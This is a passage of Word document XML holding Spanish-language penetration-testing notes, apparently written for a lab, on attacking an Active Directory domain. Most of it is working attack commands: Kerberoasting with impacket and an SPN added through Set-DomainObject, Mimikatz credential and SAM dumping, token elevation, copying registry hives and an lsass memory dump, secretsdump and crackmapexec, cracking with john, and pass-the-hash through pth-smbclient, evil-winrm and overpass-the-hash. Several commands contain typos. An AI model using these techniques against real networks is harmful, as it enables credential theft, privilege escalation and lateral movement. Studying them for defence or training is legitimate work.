        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D578B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-GetUserSPNs corp.local/empleado1:Passw0rd1 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FD6A6" w14:textId="048C5D20" w:rsidR="00D578B3" w:rsidRDefault="00D578B3" w:rsidP="00D578B3">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D578B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-GetUserSPNs corp.local/empleado1:Passw0rd1 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>outputfile (nombrearchivo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394946FF" w14:textId="1F0E5316" w:rsidR="00D578B3" w:rsidRDefault="00D578B3" w:rsidP="005122CB">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El has es crackeable con </w:t>
      </w:r>
      <w:r w:rsidRPr="00D578B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john (archivo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C3F502" w14:textId="260B417A" w:rsidR="00D578B3" w:rsidRDefault="00D578B3" w:rsidP="00D578B3">
      <w:r w:rsidRPr="00D578B3">
        <w:lastRenderedPageBreak/>
        <w:t>SI tenemos los privilegios adecuados para escribir sobre un usuario, podríamos asociarle SPN (para que sea una cuenta de servicio) y posteriormente crackearlo con impacket+john</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D368820" w14:textId="3AB0B9FB" w:rsidR="00D578B3" w:rsidRDefault="00D578B3" w:rsidP="00D578B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00F13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set-DomainObject -Identity (usuario a crackear) -Set @{serviceprincipalname=’test’/’’cualquiercosa’}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AAEE4" w14:textId="7AAA756E" w:rsidR="00F00F13" w:rsidRPr="00F00F13" w:rsidRDefault="00F00F13" w:rsidP="00D578B3">
      <w:r>
        <w:t>De esta forma crearemos un usuario propicio para hacerle Kerberoasting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2414A" w14:textId="20BC9C3F" w:rsidR="007A7409" w:rsidRDefault="007A7409" w:rsidP="007A7409">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Acceso a Credenciales y Movimientos Laterales</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3BF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8C092" w14:textId="49621E99" w:rsidR="00D578B3" w:rsidRDefault="00637273" w:rsidP="005122CB">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mimikatz:</w:t>
      </w:r>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Con una consola en modo local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A2D1A9" w14:textId="07C77FCE" w:rsidR="00637273" w:rsidRPr="00637273" w:rsidRDefault="00637273" w:rsidP="005122CB">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. \mimi.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A8B99" w14:textId="2320B370" w:rsidR="00637273" w:rsidRPr="00637273" w:rsidRDefault="00637273" w:rsidP="005122CB">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD88C7" w14:textId="38BD1883" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:r w:rsidRPr="00637273">
        <w:t>Esto nos volcará toda las credenciales de los usuarios que hayan iniciado sesión en esa máquina. Es necesario ser Administrador LOCAL</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B1F81D" w14:textId="7CCECE22" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:r>
        <w:t>También podemos suplantar el token para elevar los permisos con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F054BF7" w14:textId="14DB7040" w:rsidR="00637273" w:rsidRPr="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D9507E" w14:textId="406FCAEE" w:rsidR="00637273" w:rsidRPr="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>token:elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C545D7" w14:textId="03748226" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:r>
        <w:t>Esto nos dará acceso como SYSTEM (el máximo posible en Windows). Y podremos volcar la base de datos SAM con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D95795" w14:textId="324268D9" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lsadump::sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388226A3" w14:textId="49F444C4" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Posteriormente podemos descifrar los hashes con: </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> john --format=NT admin.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D279E8" w14:textId="13A7652F" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:r>
        <w:t>Alternativa contra Antivirus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8F727" w14:textId="4876F06E" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:r>
        <w:t>Desde una terminal podemos usar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131825C1" w14:textId="55260E02" w:rsidR="00637273" w:rsidRPr="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reg save hklm\sam sam.save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58F47B" w14:textId="757FEA6F" w:rsidR="00637273" w:rsidRPr="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reg save hklm\system system.save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49795027" w14:textId="22ACEF73" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:r>
        <w:t>Esto nos vuelca dos ficheros que podemos llevarnos a Kali. Y allí podemos usar</w:t>
      </w:r>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Impacket</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB85CE5" w14:textId="68E9ABDB" w:rsidR="00637273" w:rsidRDefault="00637273" w:rsidP="00637273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00637273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretdump -sam sam.save -system system.save LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F239859" w14:textId="58B4731F" w:rsidR="00637273" w:rsidRDefault="00843E37" w:rsidP="00637273">
      <w:r>
        <w:t>A continuación, para los logsession podemos extraerlos de una manera sencilla yendonos al Administrador de tareas, pestaña “Detalles”, buscar “lsass.exe”, click derecho, “crear archivo de volcado”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1929C871" w14:textId="0A15160D" w:rsidR="00843E37" w:rsidRDefault="00843E37" w:rsidP="00843E37">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00843E37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FB9A15" wp14:editId="1EF27A4A">
            <wp:extent cx="2079257" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17079784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978434" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2095676" cy="1766440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FB9B3" w14:textId="1E68C281" w:rsidR="00843E37" w:rsidRDefault="00843E37" w:rsidP="00637273">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>El archivo podemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDFFB5B" w14:textId="332E29DA" w:rsidR="00843E37" w:rsidRDefault="00843E37" w:rsidP="00843E37">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Desde un Windows cualquiera con Mimikatz,usar el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AE0AD" w14:textId="621215F1" w:rsidR="00843E37" w:rsidRPr="00843E37" w:rsidRDefault="00843E37" w:rsidP="00843E37">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="696"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843E37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::minidump C:\(ruta).lssas.DMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB75B7" w14:textId="31588159" w:rsidR="00843E37" w:rsidRPr="00843E37" w:rsidRDefault="00843E37" w:rsidP="00843E37">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="696"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843E37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::logonPasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A89F0" w14:textId="31FA0E3D" w:rsidR="00843E37" w:rsidRDefault="00843E37" w:rsidP="00843E37">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Si tenemos un usuario local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A54E6" w14:textId="085CEB34" w:rsidR="00843E37" w:rsidRDefault="00843E37" w:rsidP="00843E37">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843E37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump empleado1:Passw0rd1@(ip del host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A610014" w14:textId="5A40FFFF" w:rsidR="00843E37" w:rsidRPr="006B5A9D" w:rsidRDefault="006B5A9D" w:rsidP="00843E37">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5A9D">
        <w:t>también:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8245B" w14:textId="16E80AAB" w:rsidR="006B5A9D" w:rsidRDefault="006B5A9D" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>crackmapexec smb (ip) -u empleado1 -p “Passw0rd1”--sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A06C6" w14:textId="77777777" w:rsidR="006B5A9D" w:rsidRDefault="006B5A9D" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DC94D3" w14:textId="6B1F5BE6" w:rsidR="00921CD6" w:rsidRPr="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Volcado de contraseñas en caché:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F97EEB3" w14:textId="38C039D4" w:rsidR="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:r>
        <w:t>Debemos volcarlo con reg save. Concretamente en la máquina Windows que hayamos vulnerado, en Powershell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395EE1C7" w14:textId="183BC2F5" w:rsidR="00921CD6" w:rsidRPr="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reg save hklm\system system.save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38668CA7" w14:textId="573855ED" w:rsidR="00921CD6" w:rsidRPr="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reg save hklm\security security.save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2735E73B" w14:textId="7D3788C7" w:rsidR="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:r>
        <w:t xml:space="preserve">Nos genera dos archivos que podremos descifrar con </w:t>
      </w:r>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26FF8B" w14:textId="2F7DBD84" w:rsidR="00921CD6" w:rsidRPr="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump -system.save -security security.save LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59C001" w14:textId="675D2DB2" w:rsidR="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:r>
        <w:t>Copiamos la cadena de contraseña en un archivo y:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB29EAC" w14:textId="5FBE0F5A" w:rsidR="00921CD6" w:rsidRDefault="00921CD6" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john--format=mscash2 (archivo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE24EFB" w14:textId="74ADAFBF" w:rsidR="00921CD6" w:rsidRPr="003F378E" w:rsidRDefault="004B2D5C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F378E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Hash The Pass con Windows + Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3478B" w14:textId="0CCEF9A2" w:rsidR="004B2D5C" w:rsidRDefault="004B2D5C" w:rsidP="00843E37">
      <w:r>
        <w:t xml:space="preserve">Podemos sobrescribir nuestro hash de credenciales, usando la hash NTLM ( desde </w:t>
      </w:r>
      <w:r w:rsidRPr="004B2D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B2D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16908B7C" w14:textId="6D563482" w:rsidR="004B2D5C" w:rsidRPr="004B2D5C" w:rsidRDefault="004B2D5C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::pth /user:administrador /domain:corp.local /ntlm:(hash del administrador)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5E03B" w14:textId="553B914C" w:rsidR="004B2D5C" w:rsidRDefault="004B2D5C" w:rsidP="00843E37">
      <w:r>
        <w:t>Ejecutará una CMD que estará asociada a una sesión del Administrador. Una excelente forma de entrar como Administrador si no podemos crackear la contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7AC8BF" w14:textId="1FA5634C" w:rsidR="003F378E" w:rsidRDefault="003F378E" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F378E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash The Pass con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Linux + pth</w:t>
      </w:r>
      <w:r w:rsidRPr="003F378E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EE806" w14:textId="4EC7FDD4" w:rsidR="003F378E" w:rsidRDefault="003F378E" w:rsidP="003F378E">
      <w:r>
        <w:t>Suponiendo que conseguimos el hash NTLM. Usaremos pth y en este caso el módulo smbclient porque vamos a acceder a sus carpetas (existen varios módulos depende de donde queramos acceder):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B1D1A" w14:textId="68B883F4" w:rsidR="003F378E" w:rsidRDefault="003F378E" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F378E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pth-smbclient //192.168.20.5/c$ -U Administrador --pw-nt-hash (hash del Administrador) -W corp.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424B22A" w14:textId="18B6C3B8" w:rsidR="003F378E" w:rsidRDefault="00D32190" w:rsidP="003F378E">
      <w:r>
        <w:t xml:space="preserve">Para un protocolo Winrm, instalamos </w:t>
      </w:r>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>evil-winrm</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E4A4F7" w14:textId="5FF46EF9" w:rsidR="00D32190" w:rsidRPr="00D32190" w:rsidRDefault="00D32190" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo gem install evil-winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5925BE" w14:textId="45F85602" w:rsidR="00D32190" w:rsidRPr="00D32190" w:rsidRDefault="00D32190" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evil-winrm -i (ip) -u Administrador -H (hash NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673C46A" w14:textId="6164A074" w:rsidR="00D32190" w:rsidRDefault="00D32190" w:rsidP="003F378E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">También podríamos usar </w:t>
      </w:r>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:r w:rsidR="00EC6A1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00EC6A1A" w:rsidRPr="00EC6A1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(Para usar la NTML hash, hay que poner “:” delante del hash)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC6A1A">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188EB1F" w14:textId="34E03061" w:rsidR="00D32190" w:rsidRPr="00D32190" w:rsidRDefault="00D32190" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00D32190">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>administrador@192.168.20.133</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -hashes </w:t>
      </w:r>
      <w:r w:rsidR="00EC6A1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D32190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(hash NTML del Administrador)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABF80F" w14:textId="46E30FD5" w:rsidR="00D32190" w:rsidRDefault="00EC6A1A" w:rsidP="003F378E">
      <w:r>
        <w:t>Esto nos volcaría la SAM como hacíamos antes pero sin mi contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7DD37" w14:textId="77777777" w:rsidR="00643742" w:rsidRDefault="00643742" w:rsidP="003F378E"/>
    <w:p w14:paraId="546AD6DA" w14:textId="424A6F1E" w:rsidR="00643742" w:rsidRDefault="00643742" w:rsidP="003F378E">
      <w:r w:rsidRPr="00643742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Over Pass the Hash: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Podemos hacer lo mismo con el protocolo de Kerberos. </w:t>
      </w:r>
      <w:r w:rsidR="006E648D">
        <w:t>Sabemos que con Mimikatz y sakurlsa:logonpasswords podemos obterner los hashes NTML. Pero al usar el Pass The Hash en Mimikatz, no solo sustituye el hash de NTML, sino también el de Kerberos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1CF3B" w14:textId="2CC8826A" w:rsidR="006E648D" w:rsidRPr="006E648D" w:rsidRDefault="006E648D" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E648D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::path /user:administrador /domain:corp.local /ntml:(hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B237D" w14:textId="577414E2" w:rsidR="006E648D" w:rsidRDefault="006E648D" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E648D">
        <w:t xml:space="preserve">Podríamos Conseguir el ticket granting ticket del usuario administrador con </w:t>
      </w:r>
